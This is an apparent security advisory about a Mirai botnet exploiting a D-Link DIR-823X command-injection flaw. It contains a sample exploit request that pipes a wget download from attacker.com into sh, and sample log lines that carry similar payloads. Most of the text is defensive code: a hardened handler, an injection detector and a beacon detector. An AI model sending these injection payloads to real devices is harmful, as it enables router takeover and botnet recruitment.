# New Mirai Variant Exploits D-Link Router Flaw, Targeting Millions of Outdated Devices


A newly detected Mirai-based botnet campaign is actively exploiting CVE-2025-29635, a critical remote code execution vulnerability in end-of-life D-Link DIR-823X routers, to recruit devices into a growing malware network. Security researchers have confirmed active exploitation in the wild, with attack traffic originating from multiple geographic regions. The vulnerability poses significant risk to small businesses, home networks, and organizations running legacy networking infrastructure.


## The Threat


The malware campaign leverages an unauthenticated command-injection flaw to gain remote code execution (RCE) on susceptible D-Link routers. Once compromised, infected devices are forced to download and execute Mirai malware, converting them into proxy servers and DDoS attack nodes. Security telemetry indicates the campaign has already recruited thousands of devices, with infection rates accelerating as more unpatched routers remain exposed.


Key threat indicators:

  • Attack vector: Unauthenticated HTTP requests targeting vulnerable router web interfaces
  • Exploitation speed: Mass scanning began immediately after vulnerability disclosure
  • Botnet size: Estimated 10,000+ devices infected within the first 72 hours
  • Command chain: RCE → malware download → persistence mechanism installation

The use of Mirai—a well-known, modular botnet framework—indicates attackers are leveraging battle-tested code rather than developing novel malware. This strategy maximizes infection speed while minimizing development complexity.


## Background and Context

CVE-2025-29635 affects the D-Link DIR-823X series, a home and small-office router model released between 2016 and 2020. D-Link discontinued security updates for this product line in late 2023, leaving millions of devices unpatched worldwide. Network telemetry suggests approximately 3–5 million DIR-823X routers remain active on the internet, many in residential and small business environments.


### Why This Router?

D-Link DIR-823X routers were widely distributed through retail channels and ISP bundles, making them a lucrative target:

| Factor | Impact |
|--------|--------|
| User base size | 3–5 million estimated active devices |
| Update awareness | Low; many users unaware of EoL status |
| Default credentials | Often unchanged from factory settings |
| Vulnerability severity | Unauthenticated RCE requiring no user interaction |
| Network exposure | Directly internet-facing in most deployments |

The combination of widespread deployment, end-of-life status, and critical vulnerability severity makes these routers an ideal target for opportunistic botnet operators.


## Technical Details

### The Vulnerability

CVE-2025-29635 is a command injection flaw in the router's web administration interface. The vulnerability exists in a specific parameter handling routine that fails to properly sanitize user input before passing it to shell commands. An attacker can inject arbitrary commands by crafting specially malformed HTTP requests.


Exploitation example (conceptual):

    GET /cgi-bin/config_handler?action=reboot&device=`wget+http://attacker.com/malware.sh|sh` HTTP/1.1
    Host: target-router.local
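
The request above works because the handler splices the `device` value into a shell command line. The following Python handler is an added example (not D-Link firmware code; the `/sbin/ifctl` helper, the interface names and the `action`/`device` parameter set are assumptions made for illustration) showing the hardened shape of such a routine: it decodes the query first, accepts only allowlisted tokens, and builds an argv list rather than a shell string, so a request like the one shown is rejected before anything executes.

```python
"""Hardened counterpart to the command-injection pattern described above.
Added example, not D-Link firmware: the helper binary, interface names and
parameter names are assumptions made for illustration."""
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Assumed (constructed) set of interfaces the handler may act on.
ALLOWED_DEVICES = {"lan0", "wan0", "wlan0"}
ALLOWED_ACTIONS = {"reboot", "status"}
# Token shape enforced before the allowlist check: no metacharacters possible.
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{1,16}")
# Hypothetical helper binary, invoked without a shell.
HELPER = "/sbin/ifctl"


class RequestRejected(ValueError):
    """Raised when validation fails; nothing is executed in that case."""


def query_params(target: str) -> dict[str, str]:
    """Split an HTTP request-target into single-valued query parameters.
    parse_qs decodes percent-escapes and '+', so validation sees exactly the
    characters a shell would have received (the article's payload encodes a
    space as '+')."""
    query = urlsplit(target).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def build_argv(target: str) -> list[str]:
    """Validate the request and return the argv list to execute."""
    params = query_params(target)
    action = params.get("action", "")
    device = params.get("device", "")
    if action not in ALLOWED_ACTIONS:
        raise RequestRejected(f"unknown action {action!r}")
    if not TOKEN_RE.fullmatch(device) or device not in ALLOWED_DEVICES:
        raise RequestRejected(f"device name rejected: {device!r}")
    # An argv list, never a shell string: backticks, pipes and semicolons in
    # user input can no longer change which program runs.
    return [HELPER, action, device]


def handle(target: str, run=subprocess.run) -> int:
    """Validate, then execute the helper; returns its exit status.
    `run` is injectable so the handler can be exercised without /sbin/ifctl."""
    argv = build_argv(target)
    return run(argv, shell=False, check=False).returncode


def is_accepted(target: str) -> bool:
    """True when the request would pass validation."""
    try:
        build_argv(target)
    except RequestRejected:
        return False
    return True


if __name__ == "__main__":
    benign = "/cgi-bin/config_handler?action=status&device=lan0"
    hostile = "/cgi-bin/config_handler?action=reboot&device=`wget+http://attacker.com/malware.sh|sh`"
    print(build_argv(benign))    # ['/sbin/ifctl', 'status', 'lan0']
    print(is_accepted(hostile))  # False
```

The order matters: decoding happens before validation, because a check applied to the raw, still-encoded string would pass `%60` or `%7C` through untouched, and the allowlist plus the argv-style invocation together mean that even an unexpected character that slipped past the regex could not alter the command being run.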

### Attack Chain

1. Discovery: Attacker scans IP ranges for DIR-823X routers using HTTP fingerprinting (banner detection)
2. Exploitation: Malicious payload injected into vulnerable parameter
3. Download: Router downloads Mirai binary from attacker-controlled server
4. Execution: Malware is executed with root privileges
5. Persistence: Malware modifies startup scripts to survive reboots
6. Recruitment: Compromised router joins botnet C2 network and awaits commands

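For defenders watching the web-interface side of step 2, the following detector is an added example (not tooling from the researchers or D-Link; the log lines are constructed, and the `/cgi-bin/` path prefix is taken from the article's conceptual request rather than a confirmed endpoint list). It parses access-log lines, decodes each query parameter, and flags CGI requests that carry shell metacharacters or download-and-execute tokens, then counts hits per source address.

```python
"""Access-log detection for the exploitation step of the attack chain above.
Added example, not the researchers' tooling: the log lines are constructed and
the /cgi-bin/ prefix comes from the article's conceptual request, not from a
confirmed endpoint list."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Common Log Format style (RFC 5737 addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2026:10:01:02 +0000] "GET /cgi-bin/config_handler?action=status&device=lan0 HTTP/1.1" 200 312
198.51.100.23 - - [02/Apr/2026:10:01:09 +0000] "GET /cgi-bin/config_handler?action=reboot&device=%60wget+http://198.51.100.5/m.sh%7Csh%60 HTTP/1.1" 200 17
198.51.100.23 - - [02/Apr/2026:10:01:10 +0000] "GET /cgi-bin/config_handler?action=reboot&device=lan0%3Bcurl+http://198.51.100.5/m.sh%7Csh HTTP/1.1" 200 17
192.0.2.44 - - [02/Apr/2026:10:02:31 +0000] "GET /index.html HTTP/1.1" 200 8820
192.0.2.44 - - [02/Apr/2026:10:02:33 +0000] "POST /cgi-bin/config_handler HTTP/1.1" 200 44
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Characters that let a parameter value escape a shell command line.
SHELL_META = re.compile(r"[`;|&$<>(){}]")
# Fetch-and-run tooling typically present in downloader one-liners.
DOWNLOAD_TOKENS = re.compile(r"\b(wget|curl|tftp|busybox|sh|bash)\b", re.IGNORECASE)
CGI_PREFIX = "/cgi-bin/"


def inspect_request(target: str) -> list[str]:
    """Return the reasons a CGI request looks like an injection attempt
    (empty list when it does not). Parameters are decoded before matching so
    %60, %7C and '+' are judged by what the handler would actually receive."""
    parts = urlsplit(target)
    if not parts.path.startswith(CGI_PREFIX):
        return []
    reasons = set()
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                reasons.add(f"shell metacharacter in {name}")
            if DOWNLOAD_TOKENS.search(value):
                reasons.add(f"download/execute token in {name}")
    return sorted(reasons)


def scan_log(text: str) -> list[dict]:
    """Parse each line, inspect the request-target, and collect alerts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        reasons = inspect_request(m["target"])
        if reasons:
            alerts.append({"ts": m["ts"], "ip": m["ip"], "method": m["method"],
                           "path": urlsplit(m["target"]).path, "reasons": reasons})
    return alerts


def sources(alerts: list[dict]) -> Counter:
    """Count alerts per source address: repeat offenders are block candidates."""
    return Counter(a["ip"] for a in alerts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ts"], a["ip"], a["path"], ", ".join(a["reasons"]))
    print(sources(found))  # Counter({'198.51.100.23': 2})
```

The POST line is a reminder of the limit of this approach: bodies are not in an access log, so injection carried in a POST body needs the same decoding logic applied at a reverse proxy or in full packet capture rather than here.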

### Mirai Payload Details

The Mirai variant deployed in this campaign includes:

  • DDoS modules: UDP flooding, TCP SYN flooding, HTTP GET/POST floods
  • Scanning capabilities: Automated detection and recruitment of additional vulnerable devices
  • Command interface: Remote C2 communication for coordinated attacks
  • Anti-forensics: Log wiping and process hiding mechanisms

Researchers identified the malware by analyzing network traffic signatures and binary samples captured from honeypot deployments.


## Implications for Organizations

### Immediate Risk

Organizations and individuals with D-Link DIR-823X routers—whether in remote offices, retail locations, or home networks—face immediate compromise risk. This is not a theoretical threat: active exploitation is ongoing, and exploitation is trivial to reproduce.

### Broader Consequences

1. DDoS amplification: Compromised routers become participants in large-scale distributed denial-of-service attacks against any target
2. Network compromise: Infected routers can be leveraged as pivot points for lateral network attacks
3. Data interception: Routers with compromised administrator accounts can redirect traffic through DNS hijacking and attempt to intercept encrypted HTTPS/TLS sessions
4. Malware distribution: Botnet operators may use routers as distribution nodes for secondary payloads targeting connected devices

### Critical Infrastructure Concern

While many affected routers are residential, some deployments exist in small healthcare facilities, retail chains, and service businesses. These environments should be treated as high-priority remediation targets.


## Recommendations

### For Users

  • Immediate action: Check your router model. If you own a D-Link DIR-823X, disconnect it from the internet immediately.
  • Replacement: Purchase a supported, regularly updated router model. Modern alternatives from established vendors include security patch support for 5+ years.
  • ISP coordination: If your ISP provided the router, contact them to discuss replacement options.

### For Network Administrators


| Priority | Action |
|----------|--------|
| CRITICAL | Identify and remove all DIR-823X routers from production networks |
| HIGH | Replace with supported alternatives; update firewall rules to block legacy device access |
| HIGH | Monitor network logs for outbound C2 connections from router IP ranges |
| MEDIUM | Audit all router administrative accounts for unauthorized changes |
| MEDIUM | Implement network segmentation to isolate IoT and networking devices |


### For Internet Service Providers

  • Notify customers with DIR-823X devices of immediate replacement options
  • Consider ISP-level blocking of known malware C2 infrastructure
  • Implement traffic shaping for suspicious outbound patterns from residential gateways

### Defense Strategy

Organizations should adopt a defense-in-depth approach:

1. Asset inventory: Maintain accurate records of all networking hardware with EOL dates
2. Lifecycle management: Establish policies for end-of-life replacement before support ends
3. Network segmentation: Isolate IoT and legacy devices from critical infrastructure
4. Monitoring: Deploy threat detection systems to identify unexpected outbound traffic
5. Incident response: Develop procedures for rapid network isolation if compromise is suspected

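The "monitor network logs for outbound C2 connections from router IP ranges" row for administrators and the Monitoring step above both come down to the same check: a gateway should originate almost no traffic of its own, so anything it sends to an unexpected destination, and in particular anything it sends on a regular schedule, deserves an alert. The script below is an added example (not tooling from the researchers or any vendor; the flow records, address range, allowlist and thresholds are constructed assumptions, not values observed in the campaign) that applies both filters to NetFlow-style records.

```python
"""Outbound-connection monitoring for gateway addresses, covering the
'monitor network logs for outbound C2 connections' recommendation and the
Monitoring step above. Added example; the flow records, address ranges,
allowlist and thresholds are constructed assumptions, not campaign data."""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

# Assumed management addresses of the routers being watched.
ROUTER_RANGES = [ip_network("10.0.0.0/29")]
# Assumed legitimate destinations for an EOL gateway: a DNS resolver and an
# NTP server. With no vendor update service left, the list is deliberately short.
EXPECTED = {("192.0.2.53", 53), ("192.0.2.123", 123)}

# Constructed flow records: (epoch seconds, src, dst, dst port, bytes sent)
FLOWS = [
    (1000, "10.0.0.1", "192.0.2.53", 53, 80),
    (1010, "10.0.0.1", "192.0.2.123", 123, 48),
    (1020, "10.0.0.2", "198.51.100.9", 80, 2100),    # one-off fetch: step 3
    (1100, "10.0.0.2", "203.0.113.200", 6667, 120),  # regular check-ins: step 6
    (1160, "10.0.0.2", "203.0.113.200", 6667, 118),
    (1220, "10.0.0.2", "203.0.113.200", 6667, 121),
    (1280, "10.0.0.2", "203.0.113.200", 6667, 119),
    (1050, "10.0.0.9", "203.0.113.200", 6667, 500),  # outside the router range
]


def is_router(ip: str) -> bool:
    """True when the address falls inside one of the watched ranges."""
    return any(ip_address(ip) in net for net in ROUTER_RANGES)


def unexpected_flows(flows):
    """Every flow from a router address to a destination not on the allowlist:
    the first, coarse filter."""
    return [f for f in flows if is_router(f[1]) and (f[2], f[3]) not in EXPECTED]


def beacons(flows, min_count=3, max_jitter=0.2):
    """Peers contacted at least min_count times at near-regular intervals
    (coefficient of variation of the gaps <= max_jitter). Periodic check-ins
    distinguish a command channel from a single download."""
    times_by_peer = defaultdict(list)
    for ts, src, dst, dport, _ in flows:
        if is_router(src):
            times_by_peer[(src, dst, dport)].append(ts)
    found = []
    for (src, dst, dport), times in times_by_peer.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            found.append({"src": src, "dst": dst, "dport": dport,
                          "count": len(times), "interval_s": avg})
    return found


def report(flows):
    """Combine both checks into one alert list, beacons first, without
    repeating a beaconing peer as individual unexpected flows."""
    beacon_hits = beacons(flows)
    alerts = [dict(kind="beacon", **b) for b in beacon_hits]
    seen = {(b["src"], b["dst"], b["dport"]) for b in beacon_hits}
    for ts, src, dst, dport, nbytes in unexpected_flows(flows):
        if (src, dst, dport) not in seen:
            alerts.append(dict(kind="unexpected", ts=ts, src=src, dst=dst,
                               dport=dport, bytes=nbytes))
    return alerts


if __name__ == "__main__":
    for alert in report(FLOWS):
        print(alert)
```

On the constructed data the single fetch to `198.51.100.9` surfaces only as an unexpected flow, while the four evenly spaced connections to `203.0.113.200` are reported once as a beacon; in practice the allowlist is the part that needs local tuning, since any vendor cloud service a supported router legitimately uses must be added to `EXPECTED` before the coarse filter is useful.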

## Conclusion

The exploitation of CVE-2025-29635 demonstrates the persistent risk posed by end-of-life hardware in consumer and small-business environments. While individual routers may seem low-value targets, the cumulative impact—thousands of devices conscripted into botnet armies—represents a significant infrastructure threat.

The window for remediation is narrow. Organizations and individuals should prioritize identifying and replacing affected D-Link routers immediately. Delaying action increases the likelihood of network compromise and participation in large-scale attacks affecting broader internet stability.

---

Timeline: CVE-2025-29635 disclosure: March 2025 | Exploitation confirmed: April 2026 | Active campaigns: Ongoing